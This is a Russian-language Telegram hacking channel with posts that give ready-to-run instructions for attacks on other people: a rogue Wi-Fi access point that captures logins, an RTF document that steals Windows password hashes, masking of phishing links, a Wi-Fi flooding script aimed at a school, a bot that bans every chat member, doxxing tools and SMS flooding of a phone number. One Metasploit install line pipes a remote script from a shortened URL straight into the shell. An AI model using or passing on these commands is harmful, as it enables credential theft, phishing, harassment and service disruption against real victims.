Индустриальное общество
196 subscribers
12 photos
8 files
13 links
Download Telegram
​​Точка доступа для перехвата данных

Зачастую люди попросту не хотят заботиться о безопасности своих данных, и подключаясь к "Халявному" Wi-Fi сильно рискуют отдать свои деньги в руки злоумышленника.

Сейчас будет рассмотрен способ создания файловой точки доступа для подобного перехвата:

1. Устанавливаем репозиторий GitHub:

- git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

2. Переходим в директорию утилиты:

- cd WiFi-Pumpkin

3. Даём права исполняющему файлу:

- chmod +x installer.sh

4. Установка всех компонентов:

- sudo ./installer.sh --install

5. Запуск:

- wifi-pumpkin

Будет запущен графический интерфейс, зайдите в раздел "Seetings" и дайте название вашей точке доступа, затем перейдите в "Activity Monitor Settings" и поставьте галочки на пунктах "HTTP-Requests", "HTTP-Authentication" и "Pumpkin Proxy".
​​​ПРЯЧЕМ СТИЛЛЕР ПАРОЛЕЙ В ДОКУМЕНТ

Доброго времени суток! Многие из вас знают, что существует возможность поймать вирус, просто открыв какой-либо документ. Сегодня мы хотели бы показать вам, как это делают мошенники при помощи утилиты WordSteal.

При открытии пользователем подобного файла, мошенник автоматически получает хеши паролей Windows.

Погнали!

1. Первое что нам нужно - это:
Linux, Termux
2. Затем запускаем саму утилиту следующей командой:
install python git
git clone https://github.com/0x09AL/WordSteal.git
cd
chmod +x main.py
3. Когда утилита будет запущена, нам понадобится какая-либо картинка к которой нужно будет прописать абсолютный путь, либо же засунуть её в папку со скриптом и написать только её название:
main.py ваш_IP название_картинки 1
Выглядеть это будет примерно вот так:
main.py 128.0.0.1 Dakr.jpg 1

При успешном исполнении в папке должен появится RTF с вшитой полезной нагрузкой. Терминал не нужно закрывать! Далее этот файл должен кто-то откры
​Как маскировать фишинг ссылки.

UrlPhish - это утилита, которая может маскировать фишинг-ссылку достаточно хорошо, чтобы самый обычный юзер даже не смог догадаться, что его хотят взломать.

Установка:
$ pkg update
$ pkg upgrade
$ pkg install git
$ pkg install python
$ git clone https://github.com/termux-lab/UrlPhish.git
$ cd UrlPhish

Использование:
$ python urlp.py

Выбираете сайт, указываете уже готовую фишинг ссылку, даёте ей нужное имя. Готово!
DDOS WIFI

git clone https://github.com/artem-cell/wifi-dosser

cd wifi-dosser

pip2 install requests mechanize

python2 wifi-ddoser.py

python2 wifi-ddoser.py (АЙПИ) 80 (КОЛИЧЕСТВО ПАКЕТОВ)

[+] Пакетов хоть млрд..

Достаточно что бы положить школьный wi-fi

Удачи!
Как установить metasploit?

pkg install wget

wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh

chmod +x metasploit.sh

./metasploit.sh
After the installation is complete
Start postgresql

./postgresql_ctl.sh start
And run msfconsole

msfconsole
KickchatBot.py
1.2 KB
#софт

Kickchatbot

Скрипт создан с одной единственной целью - ложить чаты

Принцип предельно прост :
1. Делаем простенького ТГ бота с использованием данного скрипта
2. Добиваемся получения админки боту в чате

После получения прав, бот забанит всех участников чата
Channel name was changed to «Индустриальное общество»
SIGIT - пробив с помощью Termux

Всем привет, сегодня я вам покажу еще один очень мощный инструмент по сбору информации , на русскоязычных форумах я такого не видел, нашел на иноязычных, где неизвестный человек производил пробив человека.

SIGIT - Простой инструментарий для сбора информации

🔲 Функции:
1. userrecon -поиск имени пользователя
2. facedumper - сбор информации в facebook
3. mailfinder - поиск электронной почты с определенным именем
4. godorker - работа с поиском в Google
5. phoneinfo - информация о номере телефона
6. dnslookup - поиск в системе доменных имен
7. whoislookup - определить, кто находится в домене
8. sublookup - поиск дополнительных сетей
9. hostfinder - поиск домена хоста
10. dnsfinder - поиск системы доменных имен хоста
11. riplookup - обратный поиск ip-адресов
12. iplocation - ip-адрес для отслеживания местоположения

Установка:

▪️pkg install wget && wget https://raw.githubusercontent.com/termuxhackers-id/SIGIT/main/install.sh && bash install.sh
Impulse.py - Мощный инструмент для проведения атак на различные системы сайты и устройства.
Установка:
pkg update
pkg install python3 python3-pip git -y
git clone https://github.com/LimerBoy/Impulse
cd Impulse/
pip3 install -r requirements.txt
python3 impulse.py --help

Пример команды на атаку по номеру телефона:
python3 impulse.py --method SMS --time 20 --threads 15 --target +380123456789
Оф сайт : https://github.com/LimerBoy/Impulse
Установка метасплоит в термукс. Знаю, всех уже достала эта тема, но всё таки.
Оф сайт: https://github.com/gushmazuko/metasploit_in_termux
Если скачать обсалютно стоковый термукс, лучше будет именно с F-droid, и впихнуть туда эту команду: source <(curl -fsSL https://kutt.it/msf)
Все произойдет автоматически и в зависимости от интернета, занимает около 20 минут.
Ну а для тех кто любит делать все своими ручками :
pkg install wget

wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh

chmod +x metasploit.sh

./metasploit.sh
Но сути это не меняет.

На выхлопе имеем рабочий msf с рабочим postgres_ctl